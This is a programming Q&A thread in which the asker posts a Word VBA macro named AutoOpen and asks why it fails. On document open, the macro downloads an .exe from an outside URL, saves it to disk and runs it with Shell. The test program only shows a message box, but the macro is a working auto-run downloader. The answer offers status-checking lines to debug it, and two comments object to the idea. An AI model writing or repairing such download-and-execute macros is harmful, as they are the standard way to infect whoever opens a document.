# Run-time error '-2146697209(800c0007)': No data is available for requested resource

Tags: c++, excel, vba, ms-word

How do i use VBS to download and execute a small exe program

The C/C++ Program i used for test to just show a simple Messagebox

The MessageBox is given as thus

```
#include <stdio.h>
#include <windows.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    MessageBoxA(NULL,"Hello World", "Hello World", MB_OK);
    return 0;
}
```

And the VBS is given as thus

```
Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
xHttp.Open "GET", "https://bsite.net/regmandah/Project1.exe", False
xHttp.Send

oFSO.CreateFolder "C:\Users\Jahl"
With bStrm
  .Type = 1
  .Open
  .write xHttp.responseBody
  .savetofile "C:\Users\Jahl\file.exe", 2
End With

Shell("C:\Users\Jahl\file.exe")
End Sub
```

Please how can i get this to work properly, I am getting this Error

```
Run-time error '-2146697209(800c0007)':
No data is available for requested resource
```

Why am i getting this ?

Comment: This is not something that should ever be done.

Comment: Downloading random exes off the Intertubes? That always ends well.

Answer (score 0):

You aren't checking anything. If you can talk to the server then the code worked so no error. But that doesn't mean the server is doing what you want. You need to see what the server is returning.

Put in these lines after the `xhttp.send`.

```
Msgbox xhttp.status & " " xhttp.statustext
Msgbox xhttp.GetAllResponseHeaders
```

Also your URL requires you to login which you aren't doing.